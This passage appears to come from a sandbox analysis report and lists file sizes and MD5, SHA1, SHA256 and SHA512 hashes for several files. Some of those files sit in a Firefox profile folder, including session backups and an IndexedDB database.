SHA1a7be2e32d14a4ed8ac2d69038610677398814fbc
SHA256d656855efa0cf3ba4b921d0ff2780af41096b87f9fcaf42863b6ebe06de4d85d
SHA512441888f7fa0b46c227701b0e5c4bb33847495c2d64d8f950c49a67e3b752f47756596db31bcd3721f53d3470b93257d3df3dbb87767ba5d6313cfeeea5a12e3c
-
Filesize
6KB
MD599ff7d279878bc69f7a10eabe9d6bb48
SHA1312a990ceecca18beed8f3c6c0caaf604057596b
SHA25647722484cfc697f2aacd938c206e00f842e3ec11e029d13ce32110975e1ed64f
SHA512385f74eab5c088b9407c10bc33483f9dac3c84214087779af23c65e2abc064a9d9ec8ab6efd04ad25fafe0371c982929f185c8c758863514f39296b4ef82fe21
-
Filesize
6KB
MD54aaeaa20b72065fcdbda5e676adf9323
SHA1c2a7c8ffc22f4a4db0392c0acb2496b134a10246
SHA25650924d4fc6f5fb77671165c40f14de45145cc2647d352d87b8014e13f652aa3a
SHA5120c1ab414f5c5160ad21ce8794205711d49b8b463a4e818f61a3aeef3d6327230eb9e6c3500c1ef1c1d9ea8c52b88d8571c2783cd57263dd87cd4d3513d3b46c2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0o5pj305.default-release\sessionCheckpoints.json
Filesize228B
MD5a0821bc1a142e3b5bca852e1090c9f2c
SHA1e51beb8731e990129d965ddb60530d198c73825f
SHA256db037b650f36ff45da5df59bc07b0c5948f9e9b7b148ead4454ab84cb04fd0e2
SHA512997528e2ecd24a7e697d95cd1a2a7de46a3d80b37fd67fac4fb0da0db756b60a24648b7074255dc38f7651302f70894a53c3d789f3d7cd9f80fb91bd0cade4be
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0o5pj305.default-release\sessionstore-backups\recovery.baklz4
Filesize1KB
MD57fb03ecef4701e5303d4d28d590f85aa
SHA1d956575f29b07c7159f9a4670fdd9ca0872629a3
SHA2562c497c58c234c7b8703ada6bbef2a4128efb76dfeab64d6a3a40c91b3a4ac443
SHA512759157023c359a11075b92c8e111cd28734a133a52acf676b023fc55d7f62f1361c2732195daa47a6a261b83a4804902bc24fc3c4ac66ce4cdd0510623694f72
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0o5pj305.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize3.4MB
MD583fe6889c3ce676a89b9d88c7fa8a4b2
SHA1f5243c1d2ab4cf783bfc003962ae132e45aad0ff
SHA256eba23b1846489aed4e0a5659a7710e1941a36e5bf3f455559c8cdccbc23c6c9d
SHA512ae10ab197d1e9d85e85f4d2e288657261142e006cadbf7ceaf44b0651009a666861f0b773377ff62114ff6fb30e1c3c42bad7de775deb0989ed9d7763b48e58b
-
Filesize
2KB
MD51ca09bef4d7a7ce2a62853a49f1551ed
SHA13bfcc519d0c7a6827fe6a00afdf1f83884c7a564
SHA256bd43a4cefac872d47abbed06dd33bb062cb1a3896ae1a8ed8350d071b21ed9d6
SHA512d242bce8fe90767c9ad76ad8d30dfd2960feda53b2f86abbe3105aa59c6a7ef4123dcc05948e6d841202cda6a78daf13ecab101da85c343f6739c14914983f9d